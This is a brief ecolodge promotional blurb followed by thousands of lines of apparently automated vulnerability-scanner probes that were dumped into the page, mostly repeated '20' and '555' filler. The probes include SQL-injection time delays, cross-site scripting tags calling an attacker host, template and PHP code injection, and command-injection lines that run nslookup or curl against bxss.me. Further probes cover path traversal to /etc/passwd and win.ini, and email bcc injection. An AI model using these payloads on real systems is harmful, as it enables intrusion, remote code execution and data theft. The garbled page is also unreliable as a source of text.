The lodge will offer you a rich and varied, traditional and fragrant food: breakfast, snacks, dinners, grills, etc.
Romantic dinner on the beach while admiring the sunset, or a BBQ on the beach.
Take advantage of our idyllic setting and tailor-made service to make the best moment of your life unique and unforgettable.
A special event to celebrate or a seminar to organize, Coco Reef Ecolodge is the ideal place with its unique accommodations, local restaurants and a multitude of activities.
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20<aCf25BD<
20
20<img sRc='http://attacker-9207/log.php?
20
20
20
20
20
20FLZS5[!+!]
20
20A39bn
20}body{zzz:Expre/**/SSion(ehVh(9947))}
20
20
20
20
20<ScRiPt>ehVh(9268)</sCripT>
20u003CScRiPtehVh(9795)u003C/sCripTu003E
9378
20
20
20
20
20
20
20ehVh(9670)
20
20
20
20
20EETIY[!+!]
20
« dfbzzzzzzzzbbbccccdddeeexca ».replace(« z », »o »)
dfb__${98991*97996}__::.x
dfb[[${98991*97996}]]xca
dfb{{98991*97996}}xca
1}} »}}’}}1%> »%>’%>
20<andNmy0<
<th:t="${dfb}#foreach
20<img sRc='http://attacker-9989/log.php?
20
20
20
20
20
bfgx6339z1z2abcxhjl6339
20
bfg9233s1s2s3hjl9233
209225606
20CN8W0[!+!]
‘ »()&%
20KPo9O
20}body{zzz:Expre/**/SSion(s9C4(9733))}
20′ »()&%
20
20
20<ScRiPt>s9C4(9749)</sCripT>
20u003CScRiPts9C4(9174)u003C/sCripTu003E
9507
20
20
20
20
20
20
20
20
20s9C4(9729)
20
20
20
20
20
20PPWDC[!+!]
20
« dfbzzzzzzzzbbbccccdddeeexca ».replace(« z », »o »)
dfb__${98991*97996}__::.x
20
dfb[[${98991*97996}]]xca
dfb{{98991*97996}}xca
20
1}} »}}’}}1%> »%>’%>
@@WDVfU
1′ »
20’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’
20
<th:t="${dfb}#foreach
20
bfgx6918z1z2abcxhjl6918
20
20
bfg7748s1s2s3hjl7748
20
209904367
20
‘ »()&%
20
20*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
20′ »()&%
20
20
20
20
20
20
20
2b8UPNVV’)) OR 389=(SELECT 389 FROM PG_SLEEP(15))–
20
20
20
20
20
20
20
20
nL8oww0y’) OR 344=(SELECT 344 FROM PG_SLEEP(15))–
20
20
20
20
20
20
n3sbNKOL’ OR 384=(SELECT 384 FROM PG_SLEEP(15))–
20
20
20
20
20
20
20
20
20
20
20
-1)) OR 105=(SELECT 105 FROM PG_SLEEP(15))–
20
20
20
20
20
20
20
-5) OR 469=(SELECT 469 FROM PG_SLEEP(15))–
20
20
20
20
@@h36ln
1′ »
20’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’
-5 OR 441=(SELECT 441 FROM PG_SLEEP(15))–
20*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
MoqRITTr’; waitfor delay ‘0:0:15’ —
WmJx8BSc’)) OR 173=(SELECT 173 FROM PG_SLEEP(15))–
1 waitfor delay ‘0:0:15’ —
apG7TYxk’) OR 69=(SELECT 69 FROM PG_SLEEP(15))–
-1); waitfor delay ‘0:0:15’ —
Pwz24HnP’ OR 80=(SELECT 80 FROM PG_SLEEP(15))–
-1; waitfor delay ‘0:0:15’ —
-1)) OR 810=(SELECT 810 FROM PG_SLEEP(15))–
(select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+’ »+(select(0)from(select(sleep(15)))v)+ »*/
-5) OR 968=(SELECT 968 FROM PG_SLEEP(15))–
0″XOR(if(now()=sysdate(),sleep(15),0))XOR »Z
-5 OR 890=(SELECT 890 FROM PG_SLEEP(15))–
0’XOR(if(now()=sysdate(),sleep(15),0))XOR’Z
G0GihndA’; waitfor delay ‘0:0:15’ —
if(now()=sysdate(),sleep(15),0)
1 waitfor delay ‘0:0:15’ —
-1″ OR 2+181-181-1=0+0+0+1 —
-1′ OR 2+168-168-1=0+0+0+1 or ‘f505PwlJ’=’
-1′ OR 2+158-158-1=0+0+0+1 —
-1 OR 2+820-820-1=0+0+0+1
-1 OR 2+784-784-1=0+0+0+1 —
20
-1); waitfor delay ‘0:0:15’ —
20
-1; waitfor delay ‘0:0:15’ —
20
20
20
20
(select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+’ »+(select(0)from(select(sleep(15)))v)+ »*/
20
0″XOR(if(now()=sysdate(),sleep(15),0))XOR »Z
20
0’XOR(if(now()=sysdate(),sleep(15),0))XOR’Z
20
if(now()=sysdate(),sleep(15),0)
20
-1″ OR 2+94-94-1=0+0+0+1 —
-1′ OR 2+333-333-1=0+0+0+1 or ‘jcKNK7jI’=’
-1′ OR 2+571-571-1=0+0+0+1 —
-1 OR 2+122-122-1=0+0+0+1
-1 OR 2+856-856-1=0+0+0+1 —
20
20
20
20
20
20
20
20
20
20
20
555
555
555
555
20
20
555
20
20
555
20
20
555
555
555
555
555
20
20
555
555
20
20
555
555
20
20
555
555
20
20
555
555
20
20
20
20
20
20
20
555
555
20
20
555
555
20
555
555
555
555
555
555
555
20
555
555
20
555
20
555
555
555
20
555
555
555
20
20
555
20
20
20
20
20
20
20
20
20
20
20
555
20
555
20
@@59Uhk
1′ »
555’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’
20
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
20
SwHOnvNV’)) OR 305=(SELECT 305 FROM PG_SLEEP(15))–
555
20
20
6j4ZoCQw’) OR 602=(SELECT 602 FROM PG_SLEEP(15))–
@@rRM3g
1′ »
555’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’
20
20
dx2PA5yj’ OR 565=(SELECT 565 FROM PG_SLEEP(15))–
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
20
20
20
20
20
-1)) OR 267=(SELECT 267 FROM PG_SLEEP(15))–
U1i2k2H2′)) OR 717=(SELECT 717 FROM PG_SLEEP(15))–
20
20
-5) OR 975=(SELECT 975 FROM PG_SLEEP(15))–
gSDdHAho’) OR 139=(SELECT 139 FROM PG_SLEEP(15))–
20
20
-5 OR 782=(SELECT 782 FROM PG_SLEEP(15))–
5GszIthb’ OR 934=(SELECT 934 FROM PG_SLEEP(15))–
20
20
20
20
U9n7psTd’; waitfor delay ‘0:0:15’ —
20
20
20
-1)) OR 965=(SELECT 965 FROM PG_SLEEP(15))–
20
1 waitfor delay ‘0:0:15’ —
20
-5) OR 247=(SELECT 247 FROM PG_SLEEP(15))–
20
-1); waitfor delay ‘0:0:15’ —
20
20
20
-5 OR 801=(SELECT 801 FROM PG_SLEEP(15))–
20
20
-1; waitfor delay ‘0:0:15’ —
Ae4pxBcT’; waitfor delay ‘0:0:15’ —
20
20
(select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+’ »+(select(0)from(select(sleep(15)))v)+ »*/
1 waitfor delay ‘0:0:15’ —
20
20
0″XOR(if(now()=sysdate(),sleep(15),0))XOR »Z
-1); waitfor delay ‘0:0:15’ —
20
20
0’XOR(if(now()=sysdate(),sleep(15),0))XOR’Z
-1; waitfor delay ‘0:0:15’ —
20
20
20
20
20
20
20
if(now()=sysdate(),sleep(15),0)
(select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+’ »+(select(0)from(select(sleep(15)))v)+ »*/
20
20
-1″ OR 2+898-898-1=0+0+0+1 —
-1′ OR 2+821-821-1=0+0+0+1 or ‘FLCvK5ty’=’
-1′ OR 2+485-485-1=0+0+0+1 —
-1 OR 2+822-822-1=0+0+0+1 —
-1 OR 2+653-653-1=0+0+0+1
0″XOR(if(now()=sysdate(),sleep(15),0))XOR »Z
555
20
20
20
20
20
555
0’XOR(if(now()=sysdate(),sleep(15),0))XOR’Z
20
20
if(now()=sysdate(),sleep(15),0)
555
555
555
555
20
20
-1″ OR 2+426-426-1=0+0+0+1 —
-1′ OR 2+145-145-1=0+0+0+1 or ‘vvdguUbq’=’
555
-1′ OR 2+350-350-1=0+0+0+1 —
-1 OR 2+33-33-1=0+0+0+1
-1 OR 2+555-555-1=0+0+0+1 —
555
20
20
555
555
20
20
555
555
555
20
555
555
20
555
20
555
20
555
20
555
20
555
20
555
20
555
20
555
20
555
20
555
20
20
20
20
20
20
555
555
20
20
555
555
20
20
20
20
20
555
555
20
20
555
555
20
20
555
555
20
20
555
555
20
20
20
20
555
20
20
20
555
20
555
555
555
555
20
555
555
555
20
20
555
20
555
20
20
20
555
555
555
555
20
555
20
555
20
555
555
555
555
555
555
20
20
555
555
20
20
555
20
20
555
20
20
555
20
20
555
20<aZoRr4p<
20<img sRc='http://attacker-9440/log.php?
20
20
20
20
20GGJ7W[!+!]
555
20x6teL
20}body{zzz:Expre/**/SSion(9A6E(9754))}
20
20
20
555
20<ScRiPt>9A6E(9827)</sCripT>
20u003CScRiPt9A6E(9038)u003C/sCripTu003E
20
20
20
9124
20
20
20
20
20
20
555
20
20
20
20
20
20
555
209A6E(9664)
20
20
20<aKI3PGp<
20
20
20
20
20<img sRc='http://attacker-9396/log.php?
20
20
20
20
555
20ZIDBH[!+!]
20
207TIPH[!+!]
20
20dt5qa
« dfbzzzzzzzzbbbccccdddeeexca ».replace(« z », »o »)
20}body{zzz:Expre/**/SSion(LHCL(9203))}
20
dfb__${98991*97996}__::.x
20
dfb[[${98991*97996}]]xca
555
dfb{{98991*97996}}xca
1}} »}}’}}1%> »%>’%>
20
<th:t="${dfb}#foreach
20<ScRiPt>LHCL(9094)</sCripT>
20
20
bfgx8011z1z2abcxhjl8011
20u003CScRiPtLHCL(9742)u003C/sCripTu003E
555
9071
bfg5392s1s2s3hjl5392
209138917
20
‘ »()&%
20
20
555
20′ »()&%
20
20
20
555
20
20
20
555
20
20
20LHCL(9743)
20
20
20
20
20
555
20
20
20
555
555
555
555
20TKKZT[!+!]
20
20
20
555
« dfbzzzzzzzzbbbccccdddeeexca ».replace(« z », »o »)
555
555
555
555
555
dfb__${98991*97996}__::.x
dfb[[${98991*97996}]]xca
dfb{{98991*97996}}xca
555
20
1}} »}}’}}1%> »%>’%>
20
<th:t="${dfb}#foreach
20
20
20
bfgx9204z1z2abcxhjl9204
555
bfg9692s1s2s3hjl9692
20
209045090
555
20
20
‘ »()&%
20
20′ »()&%
20
20
20
20
20
555
20
20
20
20
20
20
20
20
20
20
20
20
555
20
20
20
20
20
20
20
20
20
20
20
20
20
555
20
20
20
20
20
20
20
20
20
20
20
20
20
20
555
20
20
20
20
20
20
20
20
20
20
20
20
555
20
20
20
20
20
20
20
20
20
20
20
20
20
20
555
20
20
20
20
20
20
20
20
20
20
20
20
20
555
20
20
20
20
20
20
20
555
20
20
20
20
555
20
20
20
20
20
20
20
555
20
20
555
555
20
20
20
20
20
555
555
20
20
555
555
555
555
555
20
20
555
555
555
555
555
555
555
20
20
555
555
20
20
20
20
20
20
20
555
555
555
555
555
20
20
555
555
20
20
20
20
20
555
555
20
20
555
555
20
20
555
555
20
20
555
555
20
20
20
20
20
20
20
555
555
20
20
555
555
20
20
20
20
20
555
555
20
20
555
555
20
20
555
555
555
555
555
555
555
20
20
555
555
20
20
20
20
20
20
20
555
555
555
555
555
20
20
555
555
555
555
555
555
555
20
20
20
20
20
555
555
20
20
555
555
555
555
555
20
20
555
555
20
20
555
555
20
20
20
20
20
20
20
555
555
20
20
555
555
20
555
555
20
555
555
20
555
555
20
555
555
20
20
555
20
20
20
20
555
555
555
209039364
;(nslookup -q=cname hitvshjlcyhpzb2116.bxss.me||curl hitvshjlcyhpzb2116.bxss.me)|(nslookup -q=cname hitvshjlcyhpzb2116.bxss.me||curl hitvshjlcyhpzb2116.bxss.me)&(nslookup -q=cname hitvshjlcyhpzb2116.bxss.me||curl hitvshjlcyhpzb2116.bxss.me)
‘ »()&%
`(nslookup -q=cname hitdnfohjfopa49e77.bxss.me||curl hitdnfohjfopa49e77.bxss.me)`
555
|(nslookup -q=cname hitggvrvdqqgc888a7.bxss.me||curl hitggvrvdqqgc888a7.bxss.me)
555
20
&(nslookup -q=cname hitpswneoripr106d0.bxss.me||curl hitpswneoripr106d0.bxss.me)&’ »`0&(nslookup -q=cname hitpswneoripr106d0.bxss.me||curl hitpswneoripr106d0.bxss.me)&`’
&nslookup -q=cname hitwixtnzxojo25a33.bxss.me&’ »`0&nslookup -q=cname hitwixtnzxojo25a33.bxss.me&`’
20′ »()&%
555
$(nslookup -q=cname hitroiiwaysjdfe47f.bxss.me||curl hitroiiwaysjdfe47f.bxss.me)
555
(nslookup -q=cname hityjltjqrost37992.bxss.me||curl hityjltjqrost37992.bxss.me))
20|echo hawvdz$() dhqridnz^xyu||a #’ |echo hawvdz$() dhqridnz^xyu||a #| » |echo hawvdz$() dhqridnz^xyu||a #
555
20
|echo wkjfqc$() peboddnz^xyu||a #’ |echo wkjfqc$() peboddnz^xyu||a #| » |echo wkjfqc$() peboddnz^xyu||a #
../20
20&echo gtnqea$() pzhyofnz^xyu||a #’ &echo gtnqea$() pzhyofnz^xyu||a #| » &echo gtnqea$() pzhyofnz^xyu||a #
20
&echo fnmjgi$() npbxsunz^xyu||a #’ &echo fnmjgi$() npbxsunz^xyu||a #| » &echo fnmjgi$() npbxsunz^xyu||a #
20
echo cqtrbx$() rjvktinz^xyu||a #’ &echo cqtrbx$() rjvktinz^xyu||a #| » &echo cqtrbx$() rjvktinz^xyu||a #
file:///etc/passwd
20
../../../../../../../../../../../../../../windows/win.ini
20
../../../../../../../../../../../../../../etc/passwd
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
555
20
20
bxss.me
20
c:/windows/win.ini
555
/etc/shells
20
20
http://bxss.me/t/fit.txt.jpg
20
Http://bxss.me/t/fit.txt
‘.print(md5(31337)).’
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
${@print(md5(31337))}
20
20
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
${@print(md5(31337))}
« ;print(md5(31337));$a= »
20
20
20
‘;print(md5(31337));$a=’
20
;assert(base64_decode(‘cHJpbnQobWQ1KDMxMzM3KSk7’));
20
20
20
20
20
20
20
20
20
20
20
20
<!–
20
‘ »
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20″||sleep(27*1000)*jcgcxx|| »
20
20
20’||sleep(27*1000)*baybpe||’
555
20
20″&&sleep(27*1000)*fhfxfk&& »
20
20
20
20’&&sleep(27*1000)*qaksje&&’
20
555
20
20
555
555
‘ »()
20
20
20
20
20
20
20
20
20
20
20
20
555
20
20
20
20
20
20
20
‘+’A’.concat(70-3).concat(22*4).concat(109).concat(69).concat(97).concat(76)+(require’socket’
Socket.gethostbyname(‘hittt’+’rmcalmsz8de33.bxss.me.’)[3].to_s)+’
20
20
20
20
« + »A ».concat(70-3).concat(22*4).concat(120).concat(75).concat(100).concat(73)+(require »socket »
Socket.gethostbyname(« hitmf »+ »krsxonrwf2be1.bxss.me. »)[3].to_s)+ »
20
20
bxss.me/t/xss.html?
20
20
20
HttP://bxss.me/t/xss.html?
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
xfs.bxss.me
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
555
20
20
20
20
^(#$!@#$)(()))******
20
20
20
555
20
20
!(()&&!|*|*|
20
20
20
20
)
555
20
20
20
20
555
20
20
20
20
555
20
20
20
20
20
20
555
20
20
20
20
555
20
20
20
20
20
20
20
20
20
20
20
20
20
« .gethostbyname(lc(« hitoj ». »rwolgwpj95701.bxss.me. »)). »A ».chr(67).chr(hex(« 58″)).chr(103).chr(87).chr(113).chr(80). »
20
20
20
‘.gethostbyname(lc(‘hitcd’.’abaisstwb1fa6.bxss.me.’)).’A’.chr(67).chr(hex(’58’)).chr(106).chr(78).chr(111).chr(67).’
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
555
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
555
20
20
20
20
20
20
20
20
20
20
20
12345′ »‘ »);|]*{‘💡
20
20
20
« +response.write(9988171*9089435)+ »
20
20
‘+response.write(9988171*9089435)+’
20
20
response.write(9988171*9089435)
20
20
20
20
20
20
20
20
209604132
to@example.com>bcc:009247.390-22864.390.6f011.20103.2@bxss.me
20
20
20bcc:009247.390-22863.390.6f011.20103.2@bxss.me
20
20
${9999085+10000222}
‘ »()&%
20
20
20
20
20
20
20
20
20
20′ »()&%
20
20
20
20
20
20
20
20
20
20
20
555
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
555
20
20
20
20
20
555
20
20
20
20
555
20
20
20
555
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
‘.print(md5(31337)).’
20
${@print(md5(31337))}
20
20
${@print(md5(31337))}
20
« ;print(md5(31337));$a= »
‘;print(md5(31337));$a=’
555
20
;assert(base64_decode(‘cHJpbnQobWQ1KDMxMzM3KSk7’));
20
20
20
20
20
20
20
20
20
20
20
../20
20
20
20
file:///etc/passwd
20
../../../../../../../../../../../../../../windows/win.ini
20
../../../../../../../../../../../../../../etc/passwd
20
20
20
20
20
<!–
20
‘ »
20
20
20
20
555
20
20
20
20
20
20
20
20
20
20
20
20
20
1665bkmqaO
20
20
20
20
bxss.me
20
20
c:/windows/win.ini
20
20
20
/etc/shells
20
20
20
20
http://bxss.me/t/fit.txt.jpg
20
20
20
Http://bxss.me/t/fit.txt
20
20
20
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
555
20
20
20
20
20
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
;(nslookup -q=cname hitrsetyfqwmy0f6be.bxss.me||curl hitrsetyfqwmy0f6be.bxss.me)|(nslookup -q=cname hitrsetyfqwmy0f6be.bxss.me||curl hitrsetyfqwmy0f6be.bxss.me)&(nslookup -q=cname hitrsetyfqwmy0f6be.bxss.me||curl hitrsetyfqwmy0f6be.bxss.me)
‘+’A’.concat(70-3).concat(22*4).concat(101).concat(77).concat(122).concat(69)+(require’socket’
Socket.gethostbyname(‘hitde’+’peatekordb60d.bxss.me.’)[3].to_s)+’
20
`(nslookup -q=cname hitfzazhhjyjhb9c9e.bxss.me||curl hitfzazhhjyjhb9c9e.bxss.me)`
« + »A ».concat(70-3).concat(22*4).concat(103).concat(71).concat(98).concat(65)+(require »socket »
Socket.gethostbyname(« hitqg »+ »gsaiazdn9301a.bxss.me. »)[3].to_s)+ »
xfs.bxss.me
20
20
|(nslookup -q=cname hitwoyxctoofy90286.bxss.me||curl hitwoyxctoofy90286.bxss.me)
20″||sleep(27*1000)*zkaorm|| »
20
20’||sleep(27*1000)*foqyjc||’
20
20
20
20
20″&&sleep(27*1000)*foqfru&& »
555
&(nslookup -q=cname hitseogqaylxzd9093.bxss.me||curl hitseogqaylxzd9093.bxss.me)&’ »`0&(nslookup -q=cname hitseogqaylxzd9093.bxss.me||curl hitseogqaylxzd9093.bxss.me)&`’
20
&nslookup -q=cname hitxbmrfqiwfd10196.bxss.me&’ »`0&nslookup -q=cname hitxbmrfqiwfd10196.bxss.me&`’
20
20’&&sleep(27*1000)*ugjlas&&’
20
20
20
bxss.me/t/xss.html?
$(nslookup -q=cname hitnvbayurgmh69dc0.bxss.me||curl hitnvbayurgmh69dc0.bxss.me)
20
(nslookup -q=cname hitejrpvkdtwq289b6.bxss.me||curl hitejrpvkdtwq289b6.bxss.me))
‘ »()
20
20
20|echo xhgsbh$() cigzzonz^xyu||a #’ |echo xhgsbh$() cigzzonz^xyu||a #| » |echo xhgsbh$() cigzzonz^xyu||a #
HttP://bxss.me/t/xss.html?
20
|echo xijfdv$() uaindunz^xyu||a #’ |echo xijfdv$() uaindunz^xyu||a #| » |echo xijfdv$() uaindunz^xyu||a #
20
20
20
20
20
20
20
&echo zczjte$() fjckuonz^xyu||a #’ &echo zczjte$() fjckuonz^xyu||a #| » &echo zczjte$() fjckuonz^xyu||a #
20
20
20&echo cteebb$() mkzicbnz^xyu||a #’ &echo cteebb$() mkzicbnz^xyu||a #| » &echo cteebb$() mkzicbnz^xyu||a #
20
20
20
20
20
20
echo uxligk$() cfwgrxnz^xyu||a #’ &echo uxligk$() cfwgrxnz^xyu||a #| » &echo uxligk$() cfwgrxnz^xyu||a #
20
20
20
20
20
20
20
20
20
20
20
20
20
555
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
555
20
20
20
20
20
20
20
20
20
20
^(#$!@#$)(()))******
20
!(()&&!|*|*|
20
20
)
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
555
20
20
20
20
20
20
20
« .gethostbyname(lc(« hitve ». »kyinvqyp13011.bxss.me. »)). »A ».chr(67).chr(hex(« 58″)).chr(115).chr(80).chr(120).chr(73). »
20
20
‘.gethostbyname(lc(‘hitlu’.’sayiwtsdc6460.bxss.me.’)).’A’.chr(67).chr(hex(’58’)).chr(100).chr(81).chr(106).chr(83).’
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
555
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
555
20
20
20
20
20
${9999383+9999892}
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
12345′ »‘ »);|]*{‘💡
20
20
20
20
20
20
20
to@example.com>bcc:009247.390-22814.390.adc83.20103.2@bxss.me
20
20
20bcc:009247.390-22813.390.adc83.20103.2@bxss.me
20
20
20
20
20
20
20
555
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
555
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
555
20
20
20
20
20
20
20
« +response.write(9333454*9681542)+ »
20
20
‘+response.write(9333454*9681542)+’
response.write(9333454*9681542)
555
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
555
20
20
20
1CPigK9A3QO
20
20
20
20
555
20
20
20
20
20
20
20
20
20
20
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
5559192700
‘ »()&%
555′ »()&%
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555″||sleep(27*1000)*olnrwg|| »
555
555’||sleep(27*1000)*drdnpy||’
555
555
555″&&sleep(27*1000)*utpzdf&& »
555’&&sleep(27*1000)*mqbucd&&’
555
555
‘ »()
Array
<!–
555
Array
555
‘ »
555
555
555
555
555
555
555
Array
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
‘.print(md5(31337)).’
555
555
555
555
555
555
555
555
${@print(md5(31337))}
555
555
${@print(md5(31337))}
« ;print(md5(31337));$a= »
555
xfs.bxss.me
555
‘;print(md5(31337));$a=’
;assert(base64_decode(‘cHJpbnQobWQ1KDMxMzM3KSk7’));
555
555
555
555
555
555
‘+’A’.concat(70-3).concat(22*4).concat(101).concat(69).concat(113).concat(87)+(require’socket’
Socket.gethostbyname(‘hitqy’+’qlxyuste07940.bxss.me.’)[3].to_s)+’
555
555
555
bxss.me
555
555
555
c:/windows/win.ini
555
555
« + »A ».concat(70-3).concat(22*4).concat(122).concat(73).concat(109).concat(65)+(require »socket »
Socket.gethostbyname(« hitdu »+ »kvqhwfud489de.bxss.me. »)[3].to_s)+ »
/etc/shells
555
555
555
555
555
555
555
http://bxss.me/t/fit.txt.jpg
555
555
Http://bxss.me/t/fit.txt
555
555
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
555
555
555
bxss.me/t/xss.html?
555
555
HttP://bxss.me/t/xss.html?
555
555
555
555
;(nslookup -q=cname hitpmcsncqzzx6f296.bxss.me||curl hitpmcsncqzzx6f296.bxss.me)|(nslookup -q=cname hitpmcsncqzzx6f296.bxss.me||curl hitpmcsncqzzx6f296.bxss.me)&(nslookup -q=cname hitpmcsncqzzx6f296.bxss.me||curl hitpmcsncqzzx6f296.bxss.me)
555
555
555
555
555
`(nslookup -q=cname hitgpxevbugef28b3c.bxss.me||curl hitgpxevbugef28b3c.bxss.me)`
555
555
555
555
|(nslookup -q=cname hitcdkmdsgwna41b16.bxss.me||curl hitcdkmdsgwna41b16.bxss.me)
555
555
555
555
&(nslookup -q=cname hitypeakjkcbwf5889.bxss.me||curl hitypeakjkcbwf5889.bxss.me)&’ »`0&(nslookup -q=cname hitypeakjkcbwf5889.bxss.me||curl hitypeakjkcbwf5889.bxss.me)&`’
555
555
555
555
555
&nslookup -q=cname hitdxdcozdxkr30b0e.bxss.me&’ »`0&nslookup -q=cname hitdxdcozdxkr30b0e.bxss.me&`’
555
(nslookup -q=cname hityexwnuzhrac6295.bxss.me||curl hityexwnuzhrac6295.bxss.me))
555
555
555
$(nslookup -q=cname hitlfpfscssiz7aa71.bxss.me||curl hitlfpfscssiz7aa71.bxss.me)
555
555|echo ptxkrx$() kmonqanz^xyu||a #’ |echo ptxkrx$() kmonqanz^xyu||a #| » |echo ptxkrx$() kmonqanz^xyu||a #
555
555
555
555
|echo oylnwv$() gdgvjknz^xyu||a #’ |echo oylnwv$() gdgvjknz^xyu||a #| » |echo oylnwv$() gdgvjknz^xyu||a #
555
555
555
555&echo vdmtga$() czmxrwnz^xyu||a #’ &echo vdmtga$() czmxrwnz^xyu||a #| » &echo vdmtga$() czmxrwnz^xyu||a #
555
555
555
&echo pcoppi$() rxnskdnz^xyu||a #’ &echo pcoppi$() rxnskdnz^xyu||a #| » &echo pcoppi$() rxnskdnz^xyu||a #
555
555
555
555
555
echo ugotmf$() qwgfrdnz^xyu||a #’ &echo ugotmf$() qwgfrdnz^xyu||a #| » &echo ugotmf$() qwgfrdnz^xyu||a #
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
^(#$!@#$)(()))******
555
555
555
!(()&&!|*|*|
555
555
555
555
)
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
« .gethostbyname(lc(« hitcj ». »hxzuwerq82b34.bxss.me. »)). »A ».chr(67).chr(hex(« 58″)).chr(110).chr(66).chr(107).chr(80). »
555
555
‘.gethostbyname(lc(‘hitlo’.’fnbcvyye7923d.bxss.me.’)).’A’.chr(67).chr(hex(’58’)).chr(111).chr(74).chr(106).chr(73).’
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
Array
555
555
555
12345′ »‘ »);|]*{‘💡
../555
555
${9999208+9999156}
555
555
555
555
file:///etc/passwd
555
555
555
555
555
555
../../../../../../../../../../../../../../windows/win.ini
555
555
555
../../../../../../../../../../../../../../etc/passwd
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
5559670034
‘ »()&%
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555′ »()&%
555
555
555
555
555
555
to@example.com>bcc:009247.390-22387.390.f595b.20103.2@bxss.me
555
555
555
555bcc:009247.390-22386.390.f595b.20103.2@bxss.me
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
« +response.write(9032423*9992270)+ »
555
555
555
555
555
555
555
‘+response.write(9032423*9992270)+’
555
555
555
555
555
555
response.write(9032423*9992270)
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
